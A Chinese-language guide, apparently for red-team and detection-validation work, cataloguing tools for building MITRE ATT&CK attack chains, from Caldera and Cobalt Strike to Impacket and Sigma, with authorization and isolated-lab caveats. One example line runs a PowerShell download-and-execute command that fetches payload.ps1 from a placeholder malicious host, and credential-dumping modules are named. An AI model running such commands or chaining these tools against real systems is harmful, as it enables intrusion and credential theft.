设计逼真的攻击链需要结合规划工具、自动化平台、测试框架和情报资源。以下分类列出关键工具及其作用,助您高效构建符合MITRE ATT&CK框架的攻击链:
一、 攻击链规划与可视化工具
-
MITRE ATT&CK Navigator
- 用途:可视化构建攻击链,映射技术(TTPs),生成交互式矩阵图。
- 优势:直接关联ATT&CK ID,支持导出JSON/Excel,团队协作标注。
- 链接:https://mitre-attack.github.io/attack-navigator/
-
BloodHound + Attack Path Mapping
- 用途:分析AD域攻击路径,可视化特权升级和横向移动链(如从普通用户到域控的路径)。
- 关键步骤:用SharpHound收集数据 → 导入BloodHound生成路径图 → 设计针对性攻击步骤。
-
Microsoft Threat Modeling Tool
- 用途:基于STRIDE模型绘制系统威胁图,辅助识别初始攻击入口点。
- 场景:设计供应链攻击或复杂应用漏洞利用链。
二、 攻击自动化与执行平台
-
Caldera (MITRE官方)
- 用途:自动化执行预定义ATT&CK攻击链,支持自定义插件和诱饵(Deception)。
- 核心能力:
- 内置54+原子测试(基于Atomic Red Team)
- 动态调整攻击路径(蓝队响应时切换TTPs)
- 链接:https://github.com/mitre/caldera
-
SCYTHE
- 商业平台:模拟高级威胁(APT/Ransomware),提供可视化攻击链编辑器。
- 优势:规避EDR检测、支持自定义恶意软件模板、生成详细威胁报告。
-
Cobalt Strike
- 红队标准工具:通过Attack Packs扩展预设攻击链(如钓鱼→提权→横向移动)。
- 关键特性:
- Malleable C2配置文件(伪装流量为合法服务)
- Beacon命令链编排(延时执行、条件触发)
三、 原子攻击技术测试框架
-
Atomic Red Team
- 用途:提供1000+条开箱即用的ATT&CK技术测试命令(PowerShell, Bash, Python)。
- 示例:
# T1059.001 (PowerShell执行恶意代码) Invoke-AtomicTest T1059.001 -TestNumbers 1 -InputArgs "IEX (New-Object Net.WebClient).DownloadString('http://malicious.host/payload.ps1')"
- 链接:https://github.com/redcanaryco/atomic-red-team
-
Invoke-ATT&CK
- 用途:基于PowerShell的模块化攻击模拟框架,支持按阶段执行TTPs。
- 场景:快速测试横向移动(Pass-the-Hash)或权限提升漏洞。
四、 命令与控制(C2)与隐蔽通信工具
-
Sliver
- 开源C2框架:支持多协议(HTTP/S, DNS, WireGuard),生成免杀Payload。
- 攻击链集成:通过
Operators
编排多阶段任务(如先提权后窃取凭证)。
-
Mythic
- 模块化C2平台:允许自定义Payload类型(如Python/Go代理),设计复杂渗出链。
- 特色:图形化任务管理、加密通信、API驱动自动化。
- 链接:https://github.com/its-a-feature/Mythic
-
DNScat2
- 用途:构建DNS隐蔽通道,用于数据渗出或绕过网络限制。
五、 漏洞利用与横向移动工具包
-
Impacket
- 核心功能:Python库实现AD协议攻击(Pass-the-Hash, Kerberoasting, DCSync)。
- 关键脚本:
psexec.py
:横向移动执行命令secretsdump.py
:提取域控哈希
-
CrackMapExec (CME)
- 用途:自动化内网渗透,一键扫描脆弱服务(SMB弱口令, WinRM未授权访问)。
- 攻击链角色:快速定位横向移动目标。
-
Metasploit Framework
- 模块化利用:通过
post/windows/gather/credentials/mimikatz
等模块组装攻击链。
- 模块化利用:通过
六、 日志与检测验证工具
-
Splunk Attack Range
- 用途:自动部署靶场环境 + 注入ATT&CK攻击 → 验证SIEM检测规则有效性。
- 输出:生成检测覆盖率报告(哪些TTPs未被发现)。
- 链接:https://github.com/splunk/attack_range
-
Sigma规则检测器
- 用途:使用Sigma规则(通用检测语法)验证攻击步骤是否触发告警。
- 工具链:
sigma-cli
:将规则转换为SIEM查询(Splunk, ELK, QRadar)Atomic Red Team + Sigma
:自动化测试检测规则覆盖率
七、 威胁情报与TTPs参考
- MITRE ATT&CK知识库
- 查询技术细节(如T1566.001 鱼叉式钓鱼附件)
- APT组织追踪:
- AlienVault OTX:分析APT历史攻击链(如APT29的Cloud Snooper攻击路径)
- Red Canary Intelligence Reports:提取真实勒索软件TTPs
工具选择建议表
需求场景 | 推荐工具 | 关键能力 |
---|---|---|
快速构建ATT&CK攻击链 | MITRE ATT&CK Navigator + Caldera | 可视化设计 + 自动化执行 |
内网渗透路径可视化 | BloodHound + Impacket | AD攻击路径发现与利用 |
隐蔽C2通信 | Sliver/Mythic | 多协议支持 + 免杀Payload |
检测规则验证 | Splunk Attack Range + Sigma | 自动化测试SIEM/EDR覆盖率 |
红蓝对抗演练 | SCYTHE/Cobalt Strike | 企业级攻击链管理与报告 |
关键注意事项
- 隔离环境:所有工具仅在隔离网络靶场使用,避免误伤生产环境。
- 合法授权:确保演练获得书面授权,遵守法律法规。
- 日志清理:演练后彻底清除工具残留(如Cobalt Strike团队服务器日志)。
- 持续更新:定期同步Atomic Red Team等库,纳入新漏洞(如ProxyShell, Log4j)。
终极建议:结合ATT&CK Navigator规划 + Caldera/Atomic Red Team执行 + Splunk Attack Range验证,形成闭环设计流程。真实攻击链需不断迭代——研究最新APT报告(如CrowdStrike年度威胁报告)并复现其TTPs。